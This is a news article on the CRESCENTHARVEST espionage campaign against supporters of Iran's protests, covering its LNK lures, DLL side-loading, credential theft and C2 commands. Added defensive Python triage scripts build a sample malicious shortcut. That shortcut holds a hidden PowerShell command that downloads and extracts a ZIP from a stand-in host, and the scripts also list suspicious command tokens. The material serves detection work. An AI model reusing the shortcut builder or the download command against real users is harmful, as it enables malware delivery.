CRESCENTHARVEST Campaign Deploys RAT Malware Against Iran Protest Supporters


Ravie Lakshmanan | Feb 19, 2026 | Cyber Espionage / Data Security

New Cyber Espionage Campaign Targeting Iranian Protesters

Researchers have uncovered a campaign, tracked as CRESCENTHARVEST, that specifically targets individuals involved in Iran's ongoing protests. Its primary aims are information theft and long-term espionage.

Surveillance Attempts Post-Protests

The Acronis Threat Research Unit (TRU) said it began observing the activity shortly after January 9. The attacks deliver a payload that functions as a remote access trojan (RAT), giving the operators the ability to execute commands, log keystrokes, and exfiltrate sensitive data. It is not yet known whether the attackers succeeded against any target.

Exploiting Emotional Appeals

Such campaigns ride on pressing geopolitical events to increase their effectiveness. According to researchers Subhajeet Singha, Eliad Kimhy, and Darrel Virtusio, victims are lured into opening malicious Windows shortcut (.LNK) files disguised as protest-related images or videos.

These files are cleverly bundled with genuine media and a Farsi-language document portraying updates from “the rebellious cities of Iran.” By framing their approach in favor of the protests, attackers aim to enhance their credibility and attract Farsi-speaking individuals seeking information about the ongoing unrest.

Attribution and Historical Context

While CRESCENTHARVEST has not yet been tied to a specific actor, it is assessed to originate from an Iran-affiliated threat group. It is the second known campaign to single out individuals connected to the nationwide protests that erupted in late 2025.

A preceding investigation by French cybersecurity firm HarfangLab identified another threat group, RedKitten, which similarly focused on NGOs and individuals documenting human rights abuses within Iran. Their method involved deploying a custom backdoor referred to as SloppyMIO.

Initial Access Techniques

Acronis has not identified the precise means of initial access used for distributing the malware. However, it is suspected that the attackers rely on spear-phishing techniques or prolonged social engineering. In these strategies, attackers build rapport over time with their intended victims before dispatching harmful payloads.

Groups such as Charming Kitten and Tortoiseshell are known for this kind of social engineering, operating fake personas and cultivating trust over extended periods before delivering a payload.

Details of the Deceptive Mechanism

The attack chain begins with a RAR archive purporting to contain material from the protests. Alongside genuine images and videos, it holds two Windows shortcut (LNK) files that use a double extension (.jpg.lnk or .mp4.lnk) to pass as media. Because Windows Explorer never displays the .lnk extension of a shortcut, the victim sees only a .jpg or .mp4 name, even with "hide extensions for known file types" turned off.

Once opened, the shortcuts run PowerShell commands that download a further ZIP archive while opening a harmless-looking image or video, so the victim sees what they expected and has no reason to suspect anything.

The ZIP archive contains a legitimately Google-signed binary, software_reporter_tool.exe (the Chrome Software Reporter Tool from Chrome's cleanup feature), together with several DLL files. One of these is a rogue library that the signed binary picks up from its own directory, a DLL side-loading technique that lets the malicious code run under the cover of a trusted, signed process.
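The shortcut stage described above is something a defender can triage offline. The following Python script, added here as an illustration and not code from the Acronis report, builds a constructed shortcut in the MS-SHLLINK binary format, parses the header and StringData back out, and flags the three things this campaign relies on: the double extension, a PowerShell download-and-extract command line, and a ShowCommand that keeps the console minimized. The sample target path, arguments, the `example.invalid` URL and the suspicious-token list are all assumptions for the demo; the article does not quote the campaign's actual command line.

```python
import struct

# LinkFlags bits from MS-SHLLINK section 2.1.1
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# {00021401-0000-0000-C000-000000000046}, the ShellLink CLSID as stored on disk
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
SW_SHOWMINNOACTIVE = 7  # common in malicious LNKs: window opens minimized, not focused

# Assumed double-extension patterns and command-line tokens for this demo
DOUBLE_EXT = (".jpg.lnk", ".jpeg.lnk", ".png.lnk", ".mp4.lnk", ".mov.lnk", ".pdf.lnk")
SUSPICIOUS_TOKENS = ("powershell", "pwsh", "-enc", "iwr", "invoke-webrequest", "downloadfile",
                     "expand-archive", "-w hidden", "-windowstyle hidden", "iex", "mshta", "rundll32")


def build_lnk(relative_path, arguments, name=None, show_command=1):
    """Construct a minimal ShellLink: 76-byte header followed by StringData only."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | HAS_ARGUMENTS
    strings = []
    if name is not None:
        flags |= HAS_NAME
        strings.append(name)  # StringData order: NAME, RELATIVE_PATH, WORKING_DIR, ARGUMENTS, ICON
    strings += [relative_path, arguments]
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in strings)
    return header + body


def parse_lnk(data):
    """Parse header, skip IDList/LinkInfo, and return the StringData fields."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a ShellLink file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:       # IDListSize (2 bytes) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                 # LinkInfoSize includes the size field itself
        off += struct.unpack_from("<I", data, off)[0]
    fields = {"show_command": show_command}
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]  # CountCharacters, no terminator
        off += 2
        if flags & IS_UNICODE:
            fields[key] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            fields[key] = data[off:off + count].decode("cp1252", errors="replace")
            off += count
    return fields


def triage_lnk(filename, data):
    """Return (parsed fields, list of human-readable findings)."""
    info = parse_lnk(data)
    findings = []
    if filename.lower().endswith(DOUBLE_EXT):
        findings.append("double extension disguises shortcut as a media file")
    cmdline = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    hits = [t for t in SUSPICIOUS_TOKENS if t in cmdline]
    if hits:
        findings.append("command line contains: " + ", ".join(hits))
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=SW_SHOWMINNOACTIVE (console kept out of the victim's view)")
    return info, findings


# Constructed sample shortcut mimicking the described chain (download ZIP, extract, open decoy)
SAMPLE_NAME = "protest_tehran_01.jpg.lnk"
SAMPLE_ARGS = ('-w hidden -c "iwr https://example.invalid/p.zip -OutFile $env:TEMP\\p.zip; '
               'Expand-Archive $env:TEMP\\p.zip $env:TEMP\\p; start $env:TEMP\\p\\decoy.jpg"')
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                       SAMPLE_ARGS, name="protest_tehran_01.jpg", show_command=SW_SHOWMINNOACTIVE)

if __name__ == "__main__":
    parsed, flagged = triage_lnk(SAMPLE_NAME, SAMPLE_LNK)
    print(parsed["relative_path"], parsed["arguments"])
    for f in flagged:
        print("-", f)
```

Real-world shortcuts usually carry a LinkTargetIDList and LinkInfo block before the StringData; the parser skips both by their declared sizes, so it works on files pulled from an archive as well as on the constructed sample. Token matching on the arguments is deliberately coarse: a hunting script wants recall, and a human reviews the hits.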

Noteworthy Components of the Malware

The malware includes:

  • urtcbased140d_d.dll: A C++ implant that extracts and decrypts Chrome's app-bound encryption keys through Chrome's own COM elevation interfaces, a design that resembles the open-source ChromElevator project.

  • version.dll (the component Acronis calls CRESCENTHARVEST): The remote access tool proper. It enumerates installed antivirus software, lists local user accounts, gathers system metadata, harvests browser credentials, and logs keystrokes.
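Because the second stage is a signed executable shipped beside a DLL whose name normally resolves to System32, a quick check of the dropped ZIP catches it before anything is executed. The Python script below is an added illustration, not code from the report: it opens an archive in memory, groups members by directory, flags any DLL that shares a name with a commonly hijacked system library and sits next to an executable, and verifies from the COFF header that each .dll member really is a DLL image. The hijackable-name list and the minimal PE stubs in the sample archive are assumptions for the demo; the script does not verify the Authenticode signature of the executable, which needs Windows tooling.

```python
import io
import struct
import zipfile
from pathlib import PurePosixPath

# DLL names programs commonly import that are not protected by the KnownDLLs
# list, so a copy in the application directory is loaded first. Assumed list
# for illustration; version.dll is the one named in the CRESCENTHARVEST report.
HIJACKABLE = {"version.dll", "dbghelp.dll", "cryptbase.dll", "wininet.dll",
              "winhttp.dll", "dwmapi.dll", "uxtheme.dll", "profapi.dll"}

IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_DLL = 0x2000


def pe_is_dll(blob):
    """True/False from the COFF Characteristics of a PE image; None if not a PE."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if e_lfanew + 24 > len(blob) or blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # COFF header follows the signature: Machine(2) Sections(2) TimeDateStamp(4)
    # SymTabPtr(4) NumSyms(4) OptHdrSize(2) Characteristics(2) -> offset +22
    characteristics = struct.unpack_from("<H", blob, e_lfanew + 22)[0]
    return bool(characteristics & IMAGE_FILE_DLL)


def triage_archive(zip_bytes):
    """Return findings for EXE+DLL co-location and malformed .dll members."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        by_dir = {}
        for m in zf.namelist():
            if m.endswith("/"):
                continue
            p = PurePosixPath(m)
            by_dir.setdefault(str(p.parent), []).append(p.name)
        for d, names in by_dir.items():
            exes = [n for n in names if n.lower().endswith(".exe")]
            dlls = [n for n in names if n.lower().endswith(".dll")]
            if not exes or not dlls:
                continue  # side-loading needs a host executable in the same directory
            for dll in dlls:
                path = dll if d == "." else f"{d}/{dll}"
                kind = pe_is_dll(zf.read(path))
                if dll.lower() in HIJACKABLE:
                    findings.append(f"{path}: system DLL name shipped beside "
                                    f"{', '.join(exes)} (side-load candidate)")
                if kind is None:
                    findings.append(f"{path}: not a PE image")
                elif kind is False:
                    findings.append(f"{path}: .dll extension but IMAGE_FILE_DLL not set")
    return findings


def fake_pe(is_dll):
    """Constructed minimal PE: DOS header (e_lfanew=0x40), PE signature, COFF header."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    flags = IMAGE_FILE_DLL if is_dll else IMAGE_FILE_EXECUTABLE_IMAGE
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 0, flags)
    return dos + b"PE\0\0" + coff


def sample_archive():
    """Constructed ZIP mirroring the described stage: signed-looking EXE, version.dll, decoy."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("software_reporter_tool.exe", fake_pe(False))
        zf.writestr("version.dll", fake_pe(True))
        zf.writestr("decoy.jpg", b"\xff\xd8\xff\xe0 constructed decoy bytes")
    return buf.getvalue()


if __name__ == "__main__":
    for line in triage_archive(sample_archive()):
        print("-", line)
```

On a real sample the next steps are to hash the executable and confirm it is the genuine Chrome Software Reporter Tool, and to dump the exports of the colliding DLL: a side-loading library either forwards the real exports or stubs them, and that export table is the quickest way to tell.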

Communication with Command and Control

CRESCENTHARVEST talks to its command-and-control server, servicelog-information[.]com, through the Windows WinHTTP API, which lets its beacons blend in with ordinary HTTP(S) traffic from the host.

Some of the malicious commands supported by the malware include:

  • Anti: Conducts anti-analysis measures.
  • His: Gathers browser history.
  • Dir: Lists directories.
  • GetUser: Retrieves user details.
  • KeyLog: Initiates keylogging capabilities.

Acronis described CRESCENTHARVEST as part of an enduring pattern of suspected state-sponsored espionage against activists, journalists, and diaspora communities worldwide. The tradecraft seen here, including initial access via LNK files, DLL side-loading, credential theft, and social engineering, follows established techniques that such operations routinely time to current geopolitical events.
